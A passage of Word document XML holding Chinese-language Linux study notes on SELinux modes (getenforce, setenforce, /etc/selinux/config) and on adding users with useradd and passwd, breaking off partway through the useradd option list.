    <w:p w14:paraId="2CD32805" w14:textId="1FAE919A" w:rsidR="0098506B" w:rsidRDefault="00E50F87" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002469DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="002469DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>selinux</w:t>
      </w:r>
      <w:r w:rsidRPr="002469DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的命令：</w:t>
      </w:r>
      <w:r w:rsidR="000812B4" w:rsidRPr="002469DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>getenforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0454331B" w14:textId="2D3941B7" w:rsidR="000812B4" w:rsidRDefault="000812B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4B37B1" w14:textId="27307354" w:rsidR="00D20290" w:rsidRDefault="00D20290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELinux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持三种模式，分别如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EFA73B" w14:textId="08C5332A" w:rsidR="00D20290" w:rsidRDefault="00D20290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>enforcing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：强制模式，代表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELinux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运作中，且已经正确的开始限制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain/type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739D1327" w14:textId="104876FA" w:rsidR="00D20290" w:rsidRDefault="00D20290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>permissive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：宽容模式：代表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELinux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运作中，不过仅会有警告讯息并不会实际限制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain/type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的存取。这种模式可以运来作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELinux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> debug </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之用；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089AD815" w14:textId="6BF4BE2B" w:rsidR="000812B4" w:rsidRDefault="00D20290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>disabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：关闭，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SELinux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并没有实际运作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083086A9" w14:textId="48AABDC9" w:rsidR="000812B4" w:rsidRDefault="000812B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593FB14B" w14:textId="305BF5C7" w:rsidR="000812B4" w:rsidRDefault="000812B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F0A8EF" w14:textId="4E50AFF5" w:rsidR="00AA5572" w:rsidRDefault="002469DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002469DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>通过配置文件修改</w:t>
      </w:r>
      <w:r w:rsidRPr="002469DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Selinux</w:t>
      </w:r>
      <w:r w:rsidRPr="002469DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的参数</w:t>
      </w:r>
      <w:r w:rsidRPr="002469DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vi /etc/selinux/config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B956CB1" w14:textId="0E77A1FD" w:rsidR="00AA5572" w:rsidRDefault="00AA5572" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E8E18AA" w14:textId="4B7277E6" w:rsidR="00AA5572" w:rsidRDefault="00AA5572" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="016E8BB9" w14:textId="57280DFE" w:rsidR="00437154" w:rsidRDefault="00437154" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SELinux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B6BD03" w14:textId="7F04E9B2" w:rsidR="00437154" w:rsidRDefault="00437154" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>setenforce [0|1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F9942" w14:textId="7A865A54" w:rsidR="00437154" w:rsidRDefault="00437154" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项与参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08147B83" w14:textId="5669464F" w:rsidR="00437154" w:rsidRDefault="00437154" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：转成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> permissive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宽容模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8A3077" w14:textId="656687DF" w:rsidR="0098506B" w:rsidRDefault="00437154" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：转成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enforcing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强制模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29776F19" w14:textId="65EDD9F0" w:rsidR="00B86044" w:rsidRDefault="00B86044" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70CEAD71" w14:textId="43E0BF69" w:rsidR="00B86044" w:rsidRDefault="00B86044" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201C069F" w14:textId="77777777" w:rsidR="00B86044" w:rsidRDefault="00B86044" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07EA7362" w14:textId="132189CF" w:rsidR="00F41E51" w:rsidRDefault="00F41E51" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="229" w:name="_Toc159779689"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="229"/>
    </w:p>
    <w:p w14:paraId="69B8722C" w14:textId="59588B1D" w:rsidR="008245E8" w:rsidRDefault="00E61767" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>useradd</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DDB0ED" w14:textId="37D94253" w:rsidR="00C3339D" w:rsidRDefault="00C3339D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59B61971" w14:textId="2CB7E840" w:rsidR="00C3339D" w:rsidRDefault="00C3339D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C44F13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44F13">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>seradd -</w:t>
      </w:r>
      <w:r w:rsidR="001339F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44F13">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/syj</w:t>
      </w:r>
      <w:r w:rsidR="00D86080">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D86080" w:rsidRPr="00C44F13">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-s /bin/bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44F13">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> syj </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FAD9B2" w14:textId="77777777" w:rsidR="00C3339D" w:rsidRDefault="00C3339D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C44F13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44F13">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>asswd syj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D235E8" w14:textId="2F6AD143" w:rsidR="00C3339D" w:rsidRPr="003F147F" w:rsidRDefault="00C3339D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FEAB1DC" w14:textId="2F64D58A" w:rsidR="00C3339D" w:rsidRDefault="00C3339D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A60CE39" w14:textId="0B0FEC7C" w:rsidR="00E51D2E" w:rsidRDefault="004F75BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就自己会生成家目录，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是不生成家目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF00F9C" w14:textId="50A3B468" w:rsidR="004F75BA" w:rsidRDefault="004F75BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是在你已经创建好的目录指定，如果没创建这个目录，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也不会自动创建，用户则不会有家目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E80A26A" w14:textId="77777777" w:rsidR="00E51D2E" w:rsidRPr="00C3339D" w:rsidRDefault="00E51D2E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14286F59" w14:textId="7833B1B7" w:rsidR="008245E8" w:rsidRDefault="005F0C94" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>useradd [-mMnr][-c &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备注</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;][-d &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登入目录</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;][-e &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有效期限</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;][-f &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓冲天数</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;][-g &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>群组</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;][-G &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>群组</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;][-s &lt;shell&gt;][-u &lt;uid&gt;][</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户帐号</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBD931A" w14:textId="11D3FC7E" w:rsidR="00E61767" w:rsidRDefault="005F0C94" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>useradd -D [-b][-e &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有效期限</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;][-f &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓冲天数</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;][-g &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>群组</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;][-G &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>群组</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;][-s &lt;shell&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8A24D9" w14:textId="2AB45FB7" w:rsidR="005F0C94" w:rsidRDefault="005F0C94" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FFE67D6" w14:textId="77777777" w:rsidR="00AF4E12" w:rsidRDefault="00AF4E12" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-c&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　加上备注文字。备注文字会保存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的备注栏位中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE24532" w14:textId="77777777" w:rsidR="00AF4E12" w:rsidRDefault="00AF4E12" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-d&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登入目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　指定用户登入时的起始目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8581CD" w14:textId="77777777" w:rsidR="00AF4E12" w:rsidRDefault="00AF4E12" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-D </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　变更预设值．</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D19260" w14:textId="77777777" w:rsidR="00AF4E12" w:rsidRDefault="00AF4E12" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-e&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有效期限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　指定帐号的有效期限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE96548" w14:textId="77777777" w:rsidR="00AF4E12" w:rsidRDefault="00AF4E12" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-f&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓冲天数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　指定在密码过期后多少天即关闭该帐号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DF7763" w14:textId="77777777" w:rsidR="00AF4E12" w:rsidRDefault="00AF4E12" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-g&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>群组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　指定用户所属的群组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F3F11A" w14:textId="77777777" w:rsidR="00AF4E12" w:rsidRDefault="00AF4E12" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-G&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>群组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　指定用户所属的附加群组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7527A6" w14:textId="77777777" w:rsidR="00AF4E12" w:rsidRDefault="00AF4E12" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-m </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　制定用户的登入目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7EBD6F" w14:textId="77777777" w:rsidR="00AF4E12" w:rsidRDefault="00AF4E12" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-M </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　不要自动建立用户的登入目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683612A7" w14:textId="77777777" w:rsidR="00AF4E12" w:rsidRDefault="00AF4E12" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　取消建立以用户名称为名的群组．</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D768DDF" w14:textId="77777777" w:rsidR="00AF4E12" w:rsidRDefault="00AF4E12" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
